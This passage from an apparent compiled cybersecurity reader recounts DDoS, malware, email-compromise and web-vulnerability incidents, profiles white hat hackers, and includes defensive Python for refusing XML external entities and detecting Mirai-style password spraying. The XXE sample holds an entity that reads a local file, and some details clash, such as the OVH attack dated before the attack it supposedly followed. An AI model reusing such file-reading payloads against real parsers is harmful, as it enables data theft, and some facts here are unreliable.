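        print(f"possible reflection flood against {victim}: {info}")
```

In production the same logic runs over exported flow data; the mitigation side (upstream scrubbing, filtering the reflector source ports at the edge) is what the affected providers in these stories relied on.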

Why the AWS Attack Matters


While the disruption caused by the AWS DDoS Attack was far less severe than it could have
been, the sheer scale of the attack and the implications for AWS hosting customers
potentially losing revenue and suffering brand damage are significant.

3. The Mirai Krebs and OVH DDoS Attacks in 2016

On September 20, 2016, the blog of cybersecurity expert Brian Krebs was assaulted by a
DDoS attack in excess of 620 Gbps, which at the time, was the largest attack ever seen.
Krebs’ site had been attacked before. Krebs had recorded 269 DDoS attacks since July 2012,
but this attack was almost three times bigger than anything his site or, for that matter, the
internet had seen before.

The source of the attack was the Mirai botnet, which, at its peak later that year, consisted of
more than 600,000 compromised Internet of Things (IoT) devices such as IP cameras, home
routers, and video players. The Mirai botnet had been discovered in August that same year
but the attack on Krebs’ blog was its first big outing.

The next Mirai botnet attack on September 19 targeted one of the largest European hosting
providers, OVH, which hosts roughly 18 million applications for over one million clients.
This attack was on a single undisclosed OVH customer and driven by an estimated 145,000
bots, generating a traffic load of up to 1.1 terabits per second, and lasted about seven days.
But OVH was not to be the last Mirai botnet victim in 2016 … please see the next section.

4. The Mirai Dyn DDoS Attack in 2016


Before we discuss the third notable Mirai botnet DDoS attack of 2016, there’s one related
event that should be mentioned. On September 30, someone claiming to be the author of the
Mirai software released the source code on various hacker forums and the Mirai DDoS
platform has been replicated and mutated scores of times since.

On October 21, 2016, Dyn, a major Domain Name Service (DNS) provider, was assaulted by
a one terabit per second traffic flood that then became the new record for a DDoS attack.
There’s some evidence that the DDoS attack may have actually achieved a rate of 1.5 terabits
per second. The traffic tsunami knocked Dyn’s services offline rendering a number of high-
profile websites including GitHub, HBO, Twitter, Reddit, PayPal, Netflix, and Airbnb,
inaccessible. Kyle York, Dyn’s chief strategy officer, reported, “We observed 10s of millions
of discrete IP addresses associated with the Mirai botnet that were part of the attack.”

5. The Six Banks DDoS Attack in 2012

On March 12, 2012, six U.S. banks were targeted by a wave of DDoS attacks—Bank of
America, JPMorgan Chase, U.S. Bank, Citigroup, Wells Fargo, and PNC Bank. The attacks
were carried out by hundreds of hijacked servers from a botnet called Brobot with each attack
generating over 60 gigabits of DDoS attack traffic per second.

At the time, these attacks were unique in their persistence. Rather than trying to execute one
attack and then backing down, the perpetrators barraged their targets with a multitude of
attack methods in order to find one that worked. So, even if a bank was equipped to deal with
a few types of DDoS attacks, they were helpless against other types of attack.

Many famous hacker attacks use malware at some point. For example, the cybercriminal can
first send you a phishing email with no attachment and no links, text only. After gaining
your trust, they can later send you a malicious attachment, that is, malware disguised as a
legitimate file.

What is a Malware Attack?

A malware attack is a common cyberattack where malware (normally malicious
software) executes unauthorized actions on the victim’s system. The malicious
software (a.k.a. virus) encompasses many specific types of attacks such as
ransomware, spyware, command and control, and more.

Criminal organizations, state actors, and even well-known businesses have
been accused of (and, in some cases, caught) deploying malware. Like
other types of cyber attacks, some malware attacks end up with mainstream
news coverage due to their severe impact.

Top 5 real-life examples of malware attacks

1. CovidLock, ransomware, 2020

Fear in relation to the Coronavirus (COVID-19) has been widely exploited by cybercriminals.
CovidLock ransomware is an example. This type of ransomware infects victims via malicious
files promising to offer more information about the disease.

The problem is that, once installed, CovidLock encrypts data from Android devices and
denies data access to victims. To be granted access, you must pay a ransom of USD 100 per
device.

2. LockerGoga, ransomware, 2019

LockerGoga is a ransomware that hit the news in 2019 for infecting large corporations in the
world, such as Altran Technologies and Hydro. It’s estimated that it caused millions of
dollars in damage in advanced and targeted attacks.

LockerGoga infections involve malicious emails, phishing scams and also credentials theft.
LockerGoga is considered a very dangerous threat because it completely blocks victims'
access to the system.

3. Emotet, trojan, 2018

Emotet is a trojan that became famous in 2018 after the U.S. Department of Homeland
Security defined it as one of the most dangerous and destructive malware. The reason for so
much attention is that Emotet is widely used in cases of financial information theft, such as
bank logins and cryptocurrencies.

The main vectors for Emotet's spread are malicious emails in the form of spam and phishing
campaigns. Two striking examples are the case of the Chilean bank Consorcio, with damages of
USD 2 million, and the case of the city of Allentown, Pennsylvania, with losses of USD 1
million.

4. WannaCry, ransomware, 2017


One of the worst ransomware attacks in history goes by the name of WannaCry, introduced
via phishing emails in 2017. The threat exploits a vulnerability in Windows.

It's estimated that more than 200,000 people have been reached worldwide by WannaCry,
including hospitals, universities and large companies, such as FedEx, Telefonica, Nissan and
Renault. The losses caused by WannaCry exceed USD 4 billion.

5. Petya, ransomware, 2016

Unlike most ransomware, Petya acts by blocking the machine's entire operating system, that
is, the Windows system. To release it, the victim has to pay a ransom.

It's estimated that the losses involving Petya and its newer and more destructive variants
amount to USD 10 billion since it was released in 2016. Among the victims are banks,
airports and oil and shipping companies from different parts of the world.

Real life Examples of Email threats


1. SolarWinds CEO Confirms Office 365 Email
‘Compromise’ Played Role In Broad-Based Attack

SolarWinds CEO Sudhakar Ramakrishna verified Wednesday that “suspicious activity”
in its Office 365 environment allowed hackers to gain access to and exploit the
SolarWinds Orion development environment.

Hackers most likely entered SolarWinds’s environment through compromised
credentials and/or a third-party application that capitalized on a zero-day
vulnerability, Ramakrishna said.

“We’ve confirmed that a SolarWinds email account was compromised and used to
programmatically access accounts of targeted SolarWinds personnel in business
and technical roles,” he said in the blog post. “By compromising credentials of
SolarWinds employees, the threat actors were able to gain access to and exploit our
Orion development environment.”

The beleaguered Austin, Texas-based IT infrastructure management vendor said a
SolarWinds email account was compromised and used to programmatically access
accounts of targeted SolarWinds personnel in business and technical roles.
By compromising the credentials of SolarWinds employees, Ramakrishna said the
hackers were able to gain access to and exploit the development environment for
the SolarWinds Orion network monitoring platform. SolarWinds was first notified
by Microsoft about a compromise related to its Office 365 environment on Dec.
13, the same day news of the hack went public.

SolarWinds’s investigation has not identified a specific vulnerability in Office 365
that would have allowed the hackers to enter the company’s environment through
Office 365, he said Wednesday. A day earlier, Ramakrishna told The Wall Street
Journal that one of several theories the company was pursuing is that the hackers
used an Office 365 account compromise as the initial point of entry into
SolarWinds.
Microsoft declined to comment to CRN. Ramakrishna said SolarWinds has
analyzed data from multiple systems and logs, including from our Office 365 and
Azure tenants, as part of its investigation. The SolarWinds hack is believed to be
the work of the Russian foreign intelligence service.

“While it’s widely understood any one company could not protect itself against a
sustained and unprecedented nation-state attack of this kind, we see an opportunity
to lead an industry-wide effort that makes SolarWinds a model for secure software
environments, development processes, and products,” Ramakrishna wrote in a blog
post Wednesday.

Some 30 percent of the private sector and government victims of the colossal
hacking campaign had no direct connection to SolarWinds, Brandon Wales, acting
director of the Cybersecurity and Infrastructure Security Agency, told The Wall
Street Journal Friday. But he said investigators haven’t identified another company
whose products were broadly compromised to infect other firms the way
SolarWinds was.
SolarWinds’s investigations will be ongoing for at least several more weeks, and
possibly months, due to the sophistication of the campaign and actions taken by the
hackers to remove evidence of their activity, he said. SolarWinds has not
determined the exact date hackers first gained unauthorized access to the
company’s environment, though innocuous code changes were first made to Orion
in October 2019.

The hackers deleted programs following use to avoid forensic discovery and
masqueraded file names and activity to mimic legitimate applications and files, he
said. The hackers had automated dormancy periods of two weeks or more prior to
activation and utilized servers outside the monitoring authority of U.S. intelligence,
he said.

Going forward, Ramakrishna said SolarWinds plans to better secure its
environment and systems against vulnerabilities by: upgrading to stronger and
deeper endpoint protection; enhancing its data loss prevention offering to better
detect low and slow leaks; expanding its Security Operations Center to improve
visibility and threat hunting; and tightening its firewall policies to further limit
east/west traffic.

From a zero trust standpoint, he said SolarWinds plans to increase and strictly
enforce requirements for multi-factor authentication in its environment, and expand
the use of a privilege access manager for admin accounts. As for third-party
application access, SolarWinds plans to boost ongoing monitoring and inspection
of SaaS tools and increase the level of pre-procurement security reviews for all
vendors.

“While we believe our prior practices were representative of practices within the
broader software industry, armed with what we’ve learned about this attack, we’re
taking immediate steps to strengthen and protect our environment by implementing
additional security practices,” Ramakrishna said.

2. Financial Regulator Hit by 240,000 Malicious Emails in Q4 2020

The UK’s financial regulator was bombarded with nearly a quarter of a million
malicious emails in the final quarter of 2020, FOI data has revealed, highlighting
the continuous pressure high-profile organizations are under to protect their assets.

Litigation firm Griffin Law filed the FOI request with powerful London-based
body the Financial Conduct Authority (FCA).

It revealed that the FCA was hit with 238,711 malicious and unsolicited emails
over the final three months of 2020, averaging out at around 80,000 per month.

November saw the highest volume (84,723), followed by October (81,799) and
December (72,288). The vast majority were classified as spam, with over 2400
containing malware including Trojans, spyware and worms, according to the
report.

The good news is that the FCA blocked all of these malicious emails sent its way,
although the real threat is not from mass automated campaigns but more highly
targeted spear-phishing attempts.

Tessian CEO, Tim Sadler, argued that phishing remains a major security problem
today because it’s easier to hack a human than it is to target software.
“Cyber-criminals, undoubtedly, want to get hold of the huge amounts of valuable
and sensitive information that FCA staff have access to, and they have nothing but
time on their hands to figure out how to get it,” he added.

“It just takes a bit of research, one convincing message or one cleverly worded
email, and a distracted employee to successfully trick or manipulate someone into
sharing company data or handing over account credentials.”

The regulator is far from faultless when it comes to cybersecurity: like many
organizations, human error has been its undoing in the past.

Back in February 2020 it apologized after accidentally posting personal
information including names, addresses and telephone numbers of some
individuals who had lodged complaints against the authority.

Ironically, the data leak occurred as part of its response to an FOI request.

3. SOC teams spend nearly a quarter of their day handling suspicious emails

Security professionals know that responding to relentless, incoming streams of
suspicious emails can be a labor-intensive task, but a new study shared exclusively
with SC Media in advance indicates just how time-consuming it actually is.

Researchers at email security firm Avanan claim to have authored the “first
comprehensive research study” that quantifies the amount of time security
operations center (SOC) employees spend preventing, responding to, and
investigating emails that successfully bypassed default security and are flagged by
end users or other reporting mechanisms.

According to the study, email threats take two to three hours of a SOC team’s time
per day, or 22.9% of a SOC team’s daily routine. The data is based upon the
responses of more than 500 IT managers and leaders surveyed by Avanan. Of the
time spent managing email threats, nearly half – 46.9% – was allocated toward
investigation, while response and prevention each took 26.6 percent of a SOC
team’s time.

Investigations take double the amount of time for a number of reasons. For one, said
Friedrich, they often require “a bit of manual work in order to do the investigation”
because SOC analysts often don’t have all the information and analysis they need
in a single view or screen to decide in one quick step if an email is malicious or
not. Also, “sometimes it takes more than one person” to review an email to
determine its validity. Procedures may call for two or three people to render a
verdict, and the original email recipient may be brought into the investigation and
asked if they were expecting an email from the purported sender.

According to the survey, the preventative tasks most commonly performed by SOC
teams are updating allow and block lists (79.6% of respondents), updating ATP
policies (64.9%), implementing new mail-flow rules (56%), updating sensitivity
and confidence settings (44.3%) and updating signature files (28.9%).
Collectively, these and other tasks result in an average of 5.59 hours spent per
week on prevention.

As for whether email threats should take up less of a SOC team’s day – that may
be in the eye of the beholder.

“In our conversations with [Security Orchestration Automation & Response]
vendors… they said to us that 90% of the events they deal with are actually
phishing,” said Avanan co-founder and CEO Gil Friedrich. In that regard, SOC
workers condensing 90% of their work into 23% of their time sounds like good
efficiency.

But even if that’s the case, the report warns that managing email threats “is time-
consuming and costly for enterprises of all sizes. Between preventing malicious
email from causing damage to reviewing end-user suspicious email reports and
false positive reports, SOC employees are overwhelmed and overworked by the
sheer state of email, both good and bad.”

Friedrich warned that the nonstop influx of suspicious emails makes SOC
employees prone to alert fatigue. Indeed, according to the report, SOCs on average
receive 68.7 end-user reports per week and 3,574 in a year, spending about 7.7
minutes on each one. Of those, 33.8% are found to be malicious, and SOC
employees will spend a little over 49 days responding to them in a given year.

False positives also pose a problem. Avanan says that SOCs on average receive 16
release-from-quarantine requests per week, with 30.73% labelled as false positives.
SOC teams spend nearly 58 days per year handling an average of 6,862 such
requests.

SOC fatigue resulting from these reports and requests can result in “real phishing
attacks being released back to employees” inadvertently, said Friedrich. “The other
problem we see is that too often the SOC professional will not handle the threat;
they will [only] handle the email. So they will not look for the phishing campaign.
They would not look for similar emails [or ask] ‘Did I get anything else from that
sender? Should I create a blocklist?’”

“I need to do more than just block one email,” Friedrich said. But of course, taking
additional steps only adds more time to the equation.
Compounding the issue is the expanding use and abuse of workplace
communication and collaboration platforms such as Slack and Teams, which have the
potential to eat into SOC analysts’ time even further. Indeed, 76.1% of respondents
agreed or strongly agreed that Slack and Teams vulnerabilities would necessitate the
implementation of further security measures within the next eight months.

To help reduce the numbers of malicious emails that drop into SOC teams’ laps,
Friedrich suggested that companies using cloud-based email services consider
moving their email security to the cloud as well, because traditional solutions built
for on-premises email are “missing too much stuff.”

“The evolution of moving your email to the cloud is now being followed with the
second revolution of moving your security to a cloud-first approach that uses API
and cloud connectivity,” Friedrich continued. “You’ll get time back for your
SOC.”

Additional cybersecurity experts also offered their own recommendations.

“If a SOC is engaged in actual attacks that start by targeting their email system,
then they need to think about better managing that attack surface as a point of
infection,” said Chris Morales, head of security analytics at Vectra. “If a SOC is
spending too much time investigating alerts from detection and response that are
just noise, then they might want to consider a less noisy system.”

Also, “More companies are spending additional dollars on third-party services that
are specifically looking at email defense,” noted Joseph Neumann, director of
offensive security at Coalfire. “Automation and cloud sourcing defense to
organizations that specialize in this specific attack vector are the best value
add. Those organizations will be the first to develop and mature automation,
machine learning or possibly AI in the future.”

4. Hackers had access to SolarWinds email system for months: report

Hackers involved in the recent breach of IT group SolarWinds, one of the largest
cyber incidents in U.S. history, likely had access to the company’s email system
for almost a year.

The Wall Street Journal reported late Tuesday that SolarWinds CEO Sudhakar
Ramakrishna said in an interview that the hackers had accessed at least one of
the company’s Office 365 email accounts in December 2019, beginning a chain of
email compromises for other accounts.
“Some email accounts were compromised,” Ramakrishna told the publication.
“That led them to compromise other email accounts and as a result our broader
[Office] 365 environment was compromised.”

The new findings  further complicate the investigation into the SolarWinds breach,
first discovered this past December, which federal officials have attributed to
sophisticated Russian hackers. 

The breach potentially impacted up to 18,000 SolarWinds’ domestic and
international customers, including the Commerce, Defense, Energy, Homeland
Security, State and Treasury departments. President Biden discussed the massive
security breach during his first call in office with Russian President Vladimir
Putin last month, and ordered the U.S. intelligence community to assess the impact
of the breach. 

SolarWinds has taken steps to increase security after the incident, including hiring
a new cybersecurity consulting group headed by former Cybersecurity and
Infrastructure Security Agency Director Christopher Krebs and former Facebook
Chief Security Officer Alex Stamos.

Ramakrishna, who took over as SolarWinds CEO at the beginning of January, told
the Journal that his “attitude was to come in and assess first and figure out what we
needed to do” in his new position. 

The news came the same day Reuters reported that Chinese hackers had separately
inserted malicious code into SolarWinds software, successfully compromising the
Department of Agriculture’s National Finance Center and potentially other federal
agencies over the course of the past year. 

A spokesperson for SolarWinds stressed Tuesday that the Chinese hackers had
been able to access the SolarWinds Orion software through breaching the
customer’s network, and that the breach was “unrelated to SolarWinds.”

“We are aware of one instance of this happening and this is separate from the
broad and sophisticated attack that targeted multiple software companies as
vectors,” the SolarWinds spokesperson told The Hill.
Real Life Examples of Web Vulnerabilities

The Panama Papers incident (Apr 2016)

The Panama Papers are a collection of 11.5 million records from Mossack
Fonseca, originally leaked to German journalist Bastian Obermyer in
2015. Due to the sheer size of the data, the International Consortium of
Investigative Journalists were approached.

Why was this significant?

Many public figures, present and past, had their financial dealings
exposed, linking them to terrorists, drug cartels and tax havens. Some
public figures had their careers affected, and in some instances, the
information directly led to public unrest.
Department of Revenue Hack (2012)

A foreign hacker was reported to have stolen 387,000 credit card
numbers and 3.6 million Social Security numbers from the South Carolina
Department of Revenue.

Why was this significant?

The IRS was hacked again in 2015, exposing the Social Security numbers,
addresses and incomes of more than 700,000 people. The attackers then used this
information to authenticate as their victims and obtain their transcripts,
resulting in more exposed data.

Even though in the first instance credit card data was encrypted, social
security numbers and other personally identifiable data were not.

Direct consequences of this incident would be the exposure of these people
to identity fraud. The 2017 Identity Fraud Study found that $16 billion was
stolen from 15.4 million U.S. consumers in 2016, and in the past six years
identity thieves have stolen over $107 billion.
How does this relate to broken authentication and session management /
sensitive data exposure?

The first breach in 2012 resulted from the default password set in the
authentication layer. In addition, the lack of encryption on some sensitive
data fields including the social security numbers increased the impact of
this incident.
A3. Sensitive Data Exposure 

Cloudbleed (2017)

Google’s Project Zero found an issue in Cloudflare’s edge servers that made it
possible to dump memory potentially containing sensitive data, some of
which was cached by search engines. This security bug was named
Cloudbleed.

Why was this significant?

Cloudflare acknowledged that the leak could have started as early as 22
September 2016, and that a private key between Cloudflare machines had
leaked. As nearly 6 million websites use Cloudflare’s services, and many
web application defenses are built on the assumption of a secure TLS
communication channel, the impact could be large. Estimates from
Cloudflare state that between 22 September 2016 and 18 February 2017,
the bug was triggered 1,242,071 times.

Cloudflare did a small sample study, with a confidence level of 99% and a
margin of error of 2.5%, which showed a limited amount of sensitive data
exposed.
Android Studio, Eclipse, IntelliJ IDEA, APKTool (2017)

Check Point’s research team found vulnerabilities in popular Android
development and reverse engineering tools used by developers, engineers
and researchers. The issues found could lead to data exposure, as well as
malicious users taking over the devices running APKTool.

The proof-of-concept attack showed that a malicious user could inject
malicious code into shared online repositories such as those on GitHub, and
thereby obtain files available on the device reading the code. Similarly, the
popular compiler APKTool has a vulnerability in its configuration YAML file,
allowing files to be extracted anywhere on the system running it.

Why was this significant?

These vulnerabilities could be used to target developers’ machines and
servers attempting to load, run, or decompile code.

In the development community, code or libraries are often shared in open
source repositories, and an attack like this could result in sensitive
documents such as credentials and source code being exposed. Developers
using these popular IDEs could be led to leak sensitive files in this
manner.

In the second scenario, the APKTool exploit can lead to Remote Code
Execution, allowing a remote malicious user to take control of the
machine, for example by extracting a PHP exploit and calling the web server
to run it.

How does this relate to XML External Entities (XXE)?

Both attacks are due to the way XML and YAML (a similar human-readable
data format) are parsed. The external reference contained in the XML
is processed without further checks, leading to the issues above.
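The parser behaviour behind the XXE case above, shown from the defender's side. This is an added example, not code from the Check Point research or from APKTool: it drives Python's expat binding directly and aborts as soon as a document declares or references an external entity, instead of fetching it. The sample documents are constructed and the SYSTEM URL is a placeholder.

```python
"""Refusing external entities when parsing untrusted XML (added illustration)."""
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when a document tries to pull in content from outside itself."""


def parse_xml_safely(xml_text: str) -> dict:
    """Parse XML but refuse any external entity declaration or reference.

    The vulnerable behaviour is a parser that resolves a SYSTEM/PUBLIC
    reference from the DTD without being asked. Here both the declaration and
    any later reference to it stop parsing instead of being resolved.
    """
    parser = xml.parsers.expat.ParserCreate()
    # Never load an external DTD subset or external parameter entities.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    result = {"root": None, "elements": [], "text": []}

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # value is None for external entities; system_id carries the URL or path.
        if value is None or system_id is not None or public_id is not None:
            raise UnsafeXmlError(f"external entity {name!r} -> {system_id!r}")

    def on_external_ref(context, base, system_id, public_id):
        # Reached only if a declaration slipped past the check above.
        raise UnsafeXmlError(f"external reference to {system_id!r}")

    def on_start(name, attrs):
        if result["root"] is None:
            result["root"] = name
        result["elements"].append(name)

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = lambda data: result["text"].append(data)

    parser.Parse(xml_text, True)  # an exception raised in a handler propagates here
    result["text"] = "".join(result["text"]).strip()
    return result


def is_xml_safe(xml_text: str) -> bool:
    """True if the document parses without attempting any external reference."""
    try:
        parse_xml_safely(xml_text)
        return True
    except UnsafeXmlError:
        return False


# Constructed samples. The SYSTEM URL is a placeholder, not a real path.
SAFE_DOC = """<?xml version="1.0"?>
<config><name>demo-app</name></config>"""

XXE_DOC = """<?xml version="1.0"?>
<!DOCTYPE config [
  <!ENTITY ext SYSTEM "file:///placeholder/path">
]>
<config><name>&ext;</name></config>"""

if __name__ == "__main__":
    print("safe document:", parse_xml_safely(SAFE_DOC))
    print("document with external entity accepted?", is_xml_safe(XXE_DOC))
```

For the YAML side of the same story the equivalent defence is a loader that refuses arbitrary tags (for example PyYAML's safe_load), which is not shown here.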
Amazon S3/Mirai (Now / Aug 2016)

Amazon S3

Notably, in recent years, numerous organizations have failed to protect their
Amazon S3 storage instances:

• Australian Broadcasting Corporation (Nov 2017) — Leakage of hashed passwords,
keys and internal resources.
• United States Army Intelligence and Security Command (Nov 2017) — Various
files, including Oracle Virtual Appliance (.ova) volumes with portions marked
top secret.
• Accenture (Sept 2017) — Authentication information, including certificates,
keys, plaintext passwords, as well as sensitive customer information.

There is an extremely high likelihood that similar issues will continue to
be found.

Why was this significant?

A large number of organizations rely on Amazon’s S3 data storage
technology, including governments and military organizations. From past
examples found, this is a pervasive problem and the information leaked
often has a high impact on the organization affected. Having a CSPM
solution when you have cloud infrastructure will help monitor common
cloud misconfigurations.

Mirai (未来)

Mirai was a botnet built from IoT devices, which carried out several high
profile attacks after its discovery; its creator (posting as Anna-senpai)
went to ground after releasing the code as open source.

Why was this significant?

Mirai ran on CCTV cameras, DVRs and routers. It essentially worked by
trying common passwords, something that can be easily avoided. The
entirety of the password list used is included below:

With such a simple method, the Mirai botnet produced 280 Gbps and 130
Mpps of DDoS capability, attacking DNS provider Dyn, leading to the
inaccessibility of sites such as GitHub, Twitter, Reddit, Netflix and
Airbnb.
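The password-guessing behaviour described above, seen from the defender's side, as an added example that is not from the original page or from Mirai: it scans device login records for one source failing logins against many devices within a short window (the scan-and-guess pattern) and then flags any later success from that source. The log format, thresholds and sample lines are constructed assumptions.

```python
"""Flag Mirai-style common-password spraying in device login logs.

Added example, not code from the original page or from Mirai itself.
The log format, thresholds and sample lines are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source failing the same few common credentials
# against several devices, then succeeding on one; plus a legitimate
# operator who mistypes once and then logs in normally.
SAMPLE_LOG = """\
2016-09-20T10:00:01Z src=198.51.100.7 dst=192.0.2.10 svc=telnet user=root result=FAIL
2016-09-20T10:00:02Z src=198.51.100.7 dst=192.0.2.10 svc=telnet user=admin result=FAIL
2016-09-20T10:00:04Z src=198.51.100.7 dst=192.0.2.11 svc=telnet user=root result=FAIL
2016-09-20T10:00:05Z src=198.51.100.7 dst=192.0.2.12 svc=telnet user=root result=FAIL
2016-09-20T10:00:09Z src=198.51.100.7 dst=192.0.2.13 svc=telnet user=root result=OK
2016-09-20T10:00:30Z src=203.0.113.5 dst=192.0.2.10 svc=ssh user=operator result=FAIL
2016-09-20T10:00:41Z src=203.0.113.5 dst=192.0.2.10 svc=ssh user=operator result=OK
"""


def parse_line(line: str) -> dict:
    """Turn one 'timestamp key=value ...' line into a dict (ts as datetime)."""
    ts_str, *fields = line.split()
    event = {"ts": datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def detect_spraying(log_text: str, window=timedelta(seconds=60), min_targets=3):
    """Return alerts as (kind, src, detail) tuples in detection order.

    'spray':      src failed logins against >= min_targets distinct devices
                  within `window`, the mass-guessing pattern Mirai used.
    'compromise': a later successful login from a source already flagged
                  as spraying, i.e. a device accepted a common password.
    """
    events = sorted(
        (parse_line(ln) for ln in log_text.splitlines() if ln.strip()),
        key=lambda e: e["ts"],
    )
    fails = defaultdict(list)   # src -> [(ts, dst), ...]
    spraying = set()
    alerts = []
    for ev in events:
        src = ev["src"]
        if ev["result"] == "FAIL":
            fails[src].append((ev["ts"], ev["dst"]))
            recent = {dst for ts, dst in fails[src] if ev["ts"] - ts <= window}
            if len(recent) >= min_targets and src not in spraying:
                spraying.add(src)
                alerts.append(("spray", src, sorted(recent)))
        elif ev["result"] == "OK" and src in spraying:
            alerts.append(("compromise", src, ev["dst"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_spraying(SAMPLE_LOG):
        print(alert)
```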

How does this relate to Security Misconfiguration?

Security misconfiguration can range from something as simple as allowing
excessive permissions to a user account, to failing to restrict resource
access to external addresses. In the cases mentioned above, the incidents
were caused by misconfiguration of the passwords protecting the systems.

5 Famous White Hat Hackers You Should Know

1.    Charlie Miller

Charlie Miller has an impressive resume, including a Ph.D. in Mathematics and five years of
experience as a hacker for the National Security Agency. However, those accomplishments
may not be the most compelling reasons why he’s one of the best white hat hackers in the
world.

Often regarded as the “Super Bowl of hacking,” CanSecWest’s annual PWN2OWN hacking
contest is incredibly difficult, and Miller has won the event four times. During his 2009
victory, he broke into a Macintosh in less than 10 seconds, improving his two-minute time
from the previous year. Additionally, Miller was the first to exploit the iPhone when it came
out, and he did the same for the first Android phone on the day it was released. In another
impressive accomplishment, Miller became the first person to exploit the iPhone remotely by
simply sending an SMS message.

Miller has also been active in automotive security. He and another hacker compromised
multiple cars, breaking into them remotely. Wired chronicled how they could infiltrate Fiat
Chrysler vehicles from anywhere in the country, controlling everything from the
radio and brakes to transmission and steering. That demonstration led to a recall for 1.4
million vehicles.

2.    Tsutomu Shimomura

Like Charlie Miller, Tsutomu Shimomura has an impressive academic background and spent
time working for the National Security Agency. The first part comes as no surprise, as
Tsutomu Shimomura is the son of Osamu Shimomura, who won the Nobel Prize in
Chemistry in 2008 for discovering a specific protein in marine organisms. Tsutomu
Shimomura became a computational physics research scientist, leading to his stint with the
National Security Agency.

Few white hat hackers can match the caliber of Shimomura’s claim to fame, which was his
involvement with the FBI in capturing high-profile and then-criminal hacker Kevin Mitnick.
Those events led to Mitnick serving five years in prison. Shimomura co-wrote a book with
journalist John Markoff, “Takedown,” about how he out-hacked and then helped locate and
capture Mitnick. A 2000 film called “Track Down” was largely based on Shimomura’s book.

3.    Greg Hoglund

Anyone interested in hacking should know the name Greg Hoglund, although he isn’t as
well-known as he should be. A pioneer in early software security, Hoglund contributed a
great amount of research about vulnerabilities and rootkits, which are sets of software tools
used to gain control of computer systems.
One event that gained Hoglund notoriety was when he exposed a large vulnerability in the
popular massively multiplayer online role-playing game (MMORPG) World of Warcraft.
That played a role in Hoglund’s career as an author, which includes “Exploiting Online
Games,” “Rootkits: Subverting the Windows Kernel,” and the bestselling “Exploiting
Software: How to Break Code.”

Hoglund’s other accomplishments include writing one of the first network vulnerability
scanners, which was installed in over half of all Fortune 500 companies, and creating and
documenting the first Windows NT-based rootkit. He regularly speaks at security
conferences.

4.    HD Moore

As a teenager, HD Moore got his formal start in security research at the age of 17 when he
worked for the U.S. Department of Defense. Even though he didn’t have the proper security
clearance, he was able to provide useful code and apply his skills on classified
projects, according to an interview with cybersecurity website Dark Reading.

Moore has played a role in discovering several critical security vulnerabilities. Perhaps the
most famous is what he accomplished with the Metasploit Framework in 2003, an open-
source penetration testing platform for uncovering network weaknesses. It was one of the
most influential security inventions of the era. The platform was later acquired by Rapid7 in
2009.

The interview named Moore as the most famous white hat hacker. Given his involvement in
information security and the several dozen speaking engagements listed on his personal
webpage, that label may be reasonable.

5.    Dan Kaminsky

Dan Kaminsky has played a large role in fighting cybercrime since 2008, when he became
one of the most widely known white hat hackers. At that time, he found a serious DNS flaw
that would allow attackers to mount cache poisoning attacks on name servers. Nearly every
internet service uses DNS protocol, so the flaw had to be patched quickly. Within a few days
of the discovery, a patch was developed.

Kaminsky has also made other important discoveries. In 2009, he located and then fixed
several flaws in SSL protocol that enabled attackers to gain certificates for sites that they
don’t control. That same year, Kaminsky became one of the first people to determine that
hosts infected by Conficker, a computer worm, had a detectable signature.
5 Scary Real-Life Cyber-Attacks (Cyber Terrorism)

1.  US Electricity grid

The US electricity grid was attacked in late 2017, an event described by the FBI and
Department of Homeland Security as “a multi-stage intrusion campaign by cyber actors
who ... conducted spear phishing, and gained remote access into energy sector
networks. After obtaining access, they conducted network reconnaissance, moved
laterally, and collected information pertaining to Industrial Control Systems.”
The threat wasn’t completely unexpected — DHS had been warning utility
providers about the potential threat since 2014 — but it highlighted the possibility of
the lights going out across the country. "They got to the point where they could
have thrown switches and disrupted power flows,” said Jonathan Homer, a department
analyst.
Large-scale disruption isn't far-fetched: in December 2015 a power cut in Western
Ukraine affected 250,000 residents and was attributed to Russian hackers — in a move
that many considered a dry run of a possible attack on the US.

2.  Federal Aviation Administration

No one wants to read the headline "Cyber-Attack Causes Plane to Fall from the
Sky", and thankfully we haven’t yet had to. But an attack on the FAA in 2015 was a
reminder of how vulnerable airspace is. The FAA handles 43,000 flights carrying 2.6
million airline passengers across 29 million square miles of airspace every day and
relies on over 100 different technology systems to do so; a breach of any of them
could potentially be fatal.
Although the 2015 event targeted administrative systems and was quickly
contained, it raised the specter of hackers shutting down radar or sending false
information to aircraft systems — concerns that were echoed in a report following the
incident.   

3.  SWIFT

If you've ever moved money between banks (and that’s pretty much all of us)
you've almost certainly used SWIFT, a secure messaging service that enables
financial transactions between 11,000 financial institutions in over 200 countries,
and handles 32 million messages, amounting to several trillion dollars, every day.

While breaching individual financial service providers requires a lot of effort,
finding a way in through a connected network like SWIFT offers a lot more bang
for your buck.

Trust and integrity are central to SWIFT’s business model, but in 2015 those
values were overturned by a series of real-life cyber-attacks that resulted in sizable
losses. The main attack centered on the Bangladesh Central Bank (BCB), with
criminals attempting an eye-watering theft of $1 billion.
The bad actors used the SWIFT network to fool the US Federal Reserve into
transferring BCB funds to them. (It's not uncommon for the US Fed to hold
international banking assets.) As a basic security check, SWIFT sends details of
any transfer to the printers of the financial institution behind the request.
Under normal circumstances, with that added layer of review in place, a BCB
official who sees a request of that size would stay the transfer until
confirmation can be had (especially if, as was the case here, the funds are
being sent to an unknown account). In order to get the attack out of the gate
successfully, therefore, the attackers cleverly used malware to disable the bank's
printers.
In the end, the full attack was thwarted, but $81 million still went missing!

4.  United States Central Command

Back in 2008, US Central Command (CENTCOM) was the military center for the
United States military’s Middle East operations. A USB drive, found in a parking
lot and containing the [Link] worm, was inserted into a laptop connected to the
CENTCOM network. From there it spread undetected to other systems, both
classified and unclassified.

Opinion is divided as to what information the worm found, and what it was able to
do with it. While it could open backdoors on infected computers, the classified
computer network wasn’t connected to the internet – meaning that it got the chance
to spread too fast and too far to be contained.
Nevertheless, the event was a wakeup call and was described by the Pentagon as
